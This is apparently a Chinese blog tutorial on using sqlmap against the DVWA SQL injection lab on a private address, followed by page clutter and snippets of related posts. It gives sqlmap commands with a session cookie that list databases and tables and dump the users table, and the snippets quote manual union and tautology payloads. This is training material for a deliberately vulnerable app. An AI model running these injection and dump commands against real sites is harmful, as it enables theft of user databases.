利用sqlmap对dvwa进行sql注入

最新推荐文章于 2024-03-27 14:35:55 发布
最新推荐文章于 2024-03-27 14:35:55 发布
阅读量4.6k 收藏 21
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47912094/article/details/119522742
版权

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:
1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3)基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4)联合查询注入,可以使用union的情况下的注入。
5)堆查询注入,可以同时执行多条语句的执行时的注入。

安装很简单:
由于SQLMap是利用Python语言写的,所以需要将Python这个语言环境给安装上,以下是详细安装过程:
准备工作:
(1) Python2.7.11,下载地址:https://www.python.org/downloads/
(2) SQLMap,下载地址:http://sqlmap.org/

进入本次sqlmap的渗透用法:
在这里插入图片描述
可以看出需要登录,加上cookie:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch

在这里插入图片描述
成功:可看到服务器配置信息,继续拿数据库信息;
在这里插入图片描述
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch --dbs
在这里插入图片描述
查看指定数据库并展示所有表:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch -D dvwa --tables
在这里插入图片描述
查看指定数据库的指定表的所有列:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch -D dvwa -T users --columns
在这里插入图片描述
查询指定列数据:
sqlmap.py -u “http://192.168.124.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=k7bc386n0qiu56mjegpq2a4iu1” --batch -D dvwa -T users -C user --dump
在这里插入图片描述
成功注出数据。

CoOlCoKeZ
关注
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqlmap在windows上执行sql注入利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWA通关--SQL注入(SQL Injection)
热门推荐
箭雨镜屋
01-26 1万+
LOW 通关步骤 1、找闭合 输入1' 报错 输入1'',不报错,说明闭合是单引号 2、确定列数 输入1' order by 2#,返回正确结果 输入1' order by 3#,报错,说明只有两列 3、 sql注入时union出错(Illegal mix of collations for operation UNION) 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析 总结 ...
【渗透测试】|sqlmap工具注入-基于dvwa的sql injection
yangdan_jiayou的博客
03-27 503
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
SQL注入——利用sqlmap工具对DVWA进行盲注
weixin_56438805的博客
03-23 1985
因为手工注入略显麻烦,所以在此尝试用sqlmap工具注入。 查看了帮助命令 一.SQL Injection的Low等级 此为get型、id注入点为布尔型盲注,并扫出了版本号 共有9个数据库 查看数据库DVWA的表 共2个表 查看users表中的字段 共8个字段 查看用户名和密码 让整表输出 二.SQL Injection的medium等级 post型,需加–data 在此我输入的ID=5 编辑重发ID=5 or 1=1 发送后,可显示如下图 查看为post型,id注入点为布尔型盲注,并扫出
1、渗透之利用sqlmapdvwa进行sql注入
tzyyy1的博客
02-28 7108
测试环境:dvwa+Kail 1、寻找注入点:http://192.168.43.75/dvwa/vulnerabilities/sqli/ 1.2、注入点初步测试: 1' union select user, password from users# 1.3、继续测试:1'or'1'='1 2、使用Kail工具测试: sqlmap -u http://192.168.43....
sqlmap自动化漏洞利用DVWA初、中、高)
qq_42620328的博客
10-14 6206
sqlmap自动化漏洞利用DVWA
Sqlmap
mumuzi2的博客
02-25 378
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
SQL注入DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 4933
SQL注入DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
sqlmap快速上手教程
weixin_34138377的博客
10-31 305
为什么80%的码农都做不了架构师?>>> ...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 1472
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 1691
SQL注入与自动注入
利用sqlmapapi进行批量检测sql注入
最新发布
03-28
本程序利用百度爬取特定的url链接,然后调用sqlmapapi(sqlmap自带的批量接口),进行注入的判断。 AutoSqli.py中option的设置可参考set_option.txt;可自定义判断注入的方法,例如,基于时间/布尔等。
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
sqlmapdvwa进行sql注入
weixin_52971422的博客
04-01 4721
渗透环境:dvwa 攻击机:kali 注入点 测试 在kali使用sqlmap,添加cooki来注入 sqlmap -u "http://192.168.17.152/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=24d706127dc1260818eadf1641c43547" --dbs 成功 继续查询数据库的表 sqlmap -u "http://1
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1248
网络安全-sqlmap学习笔记 sqlmap上面的总连接
使用sqlmapdvwa进行sql注入
anma5413的博客
12-21 841
1.下载安装dvwa,可以去此处下载:http://www.dvwa.co.uk/ 2.需要安装python运行环境,我使用的是python2.7,python2.7-3.0之间的应该都可以。 3.下载sqlmap包并将其解压 4.直接cmd运行sqlmap,输入sqlmap.py -h查看帮助信息 我在运行sqlmap的时候遇到了这么一个问题,就是输入sqlmap.py -[o...
使用Sqlmapdvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3361
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
sqlmap dvwa
08-25
SQLMap是一款用于自动化SQL注入的工具,DVWA是一个开放性漏洞测试应用程序,用于训练和教育安全专业人员。SQLMap可以用来测试DVWA中的SQL注入漏洞。 使用SQLMapDVWA进行SQL注入测试的步骤如下: 1. 打开Kali的SQLMap,确认已经安装了SQLMap。 2. 使用注入探测命令来测试目标注入点,命令格式为:sqlmap -u "[目标注入点]"。 3. 在进行注入探测后,如果成功找到注入点,可以继续使用SQLMap来读取数据。可以使用命令:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=u6v3a75ip46i3evan1pmvu09od; security=low" -D dvwa -T users --dump,将第四步命令后面的--columns替换为--dump,这样可以读取数据。 总结起来,SQLMap是一款用于自动化SQL注入的工具,而DVWA是一个开放性漏洞测试应用程序。通过使用SQLMapDVWA进行SQL注入测试,可以发现并利用DVWA中的SQL注入漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [sqlmap自动化漏洞利用DVWA初、中、高)](https://blog.csdn.net/qq_42620328/article/details/127315325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范](https://blog.csdn.net/weixin_43263566/article/details/128539258)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值